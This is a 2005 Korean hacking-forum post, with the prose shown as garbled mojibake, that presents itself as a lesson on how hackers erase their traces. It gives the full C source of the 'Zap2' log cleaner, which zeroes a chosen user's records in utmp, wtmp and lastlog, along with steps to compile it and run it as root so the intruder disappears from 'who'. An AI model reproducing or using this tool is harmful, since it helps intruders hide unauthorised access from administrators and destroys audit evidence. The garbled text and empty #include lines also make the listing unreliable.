http://www.hackerschool.org/HS_Boards/zboard.php?id=Free_Lectures&no=333 [º¹»ç]
*ÇØÄ¿µéÀÌ ÀÚ½ÅÀÇ ÈçÀûÀ» Áö¿ì´Â ¹æ¹ý
ÀÚ½ÅÀÇ ·Î±ä Á¤º¸¸¦ Áö¿ì´Â ÇÁ·Î±×·¥Àº
±âº»ÀûÀ¸·Î /etc/utmp¿Í /var/adm/wtmp¿Í /var/adm/lastlog¿¡ ´ëÇÑ Àбâ¿Í
¾²±â±ÇÇÑÀÌ ÀÖ¾î¾ß ÇÕ´Ï´Ù. SunOS 4.1.X°è¿ÀÇ utmpÀÇ ¸ðµå°¡ -rw-rw-rw-·Î
µÇ¾î ÀÖ°í SunOS 5.X °è¿ÀÇ utmpÀÇ ¸ðµå´Â -rw-r-r-·Î µÇ¾î ÀÖ½À´Ï´Ù.
½Ã½ºÅÛ¿¡ µû¶ó ´Ù¸¦ ¼öµµ ÀÖÁö¿ä. µû¶ó¼, ÀÌ ÇÁ·Î±×·¥À» ½ÇÇàÇØ º¸·Á°í ÇÏ´Â
»ç¶÷Àº SunOS 4.1.XÀ» »ç¿ëÇØ¾ß ÇÕ´Ï´Ù. ÀÌ´Â uname -aÀÇ ¸í·É¾î·Î ¾Ë¾Æ º¼ ¼ö
ÀÖ½À´Ï´Ù. ±×·±µ¥ ÀÚ½ÅÀÌ ÀÏ¹Ý »ç¿ëÀÚ°¡ ¾Æ´Ñ root¶ó¸é ±¸Áö OSÀÇ ¹öÀü¿¡
¿µÇâÀ» ¹ÞÀ» ÇÊ¿ä°¡ ¾ø½À´Ï´Ù. ÇØÄ¿³ª ´Ù¸¥ »ç¶÷ÀÌ Á¢¼ÓÇÏ¸é ½Ã½ºÅÛ¿¡
/etc/utmp, /usr/adm/wtmp¿Í /usr/adm/lastlog ÆÄÀÏ¿¡ Á¢¼Ó ±â·ÏÀÌ ³²½À´Ï´Ù.
±×·¡¼ ÈçÀûÀ» ¾ø¾Ö±â À§Çؼ´Â À§ÀÇ ÈÀÏÀ» º¯°æÇÕ´Ï´Ù. À̰͵éÀº ÅؽºÆ® ÆÄÀÏÀÌ
¾Æ´Ï¶ó¼ vi·Î ÆíÁýÇÒ ¼ö ¾ø°í Ưº°ÇÑ ¸ñÀûÀ» Áö´Ñ ÇÁ·Î±×·¥À» ÀÛ¼ºÇØ¾ß ÇÕ´Ï´Ù.
¹Ù·Î ±× ÇÁ·Î±×·¥ÀÌ ¾Æ·¡¿¡ ÀÖ´Â ÇÁ·Î±×·¥ÀÔ´Ï´Ù. C¾ð¾î·Î ÀÛ¼º µÇ¾î ÀÖ½À´Ï´Ù.
ÀÌ ÇÁ·Î±×·¥ ¸»°íµµ ¿©·¯ °¡ÁöÀÇ ÈçÀû Áö¿ì´Â ÇÁ·Î±×·¥ÀÌ ÀÖ´Ù´Â °ÍÀ» ¾Ë·Áµå¸³´Ï´Ù.
¾Æ·¡ ÇÁ·Î±×·¥À» rootÀÇ ±ÇÇÑ¿¡¼ µ¹·Á¼ Á¢¼ÓÈçÀûÀ» Áö¿ó´Ï´Ù.
À¯´Ð½º ½© »óÅ¿¡¼ ¾Æ·¡ ÆÄÀϸíÀ» test.c·Î ÀúÀåÇؼ cc -o rmuser test.c ·Î
ÄÄÆÄÀÏ Çؼ rmuser¸¦ ½ÇÇà½ÃÅ°¸é µË´Ï´Ù.
hack%cc -o rmuser test.c
hack%rmuser
À§ÀÇ ¸í·ÉÀ» ½ÇÇàÇؼ who¶ó°í ¸í·É Çغ¸½Ê½Ã¿À.
±ôÂÊ °°ÀÌ ÀÚ½ÅÀÌ »ç¶óÁ® ÀÖÀ» °Ì´Ï´Ù.
Âü°í·Î who´Â ÇöÀç ½Ã½ºÅÛ¿¡ ·Î±äÇØ ÀÖ´Â »ç¿ëÀÚ¸¦ ¾Ë¾Æº¸´Â ¸í·É¾î ÀÔ´Ï´Ù.
ÇÁ·Î±×·¥ ¼Ò½º tset.cÀÇ ³»¿ë
#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
int f;
void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;
pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else {
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL) {
if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
bzero((char *)&newll,sizeof( newll ));
write(f, (char *)&newll, sizeof( newll ));
close(f);
}
} else printf("%s: ?\n",who);
}
main(argc,argv)
int argc;
char *argv[];
{
if (argc==2) {
kill_lastlog(argv[1]);
kill_wtmp(argv[1]);
kill_utmp(argv[1]);
printf("Zap2!\n");
} else printf("Error.\n");
}
|
Hit : 13241 Date : 2005/10/08 03:53
|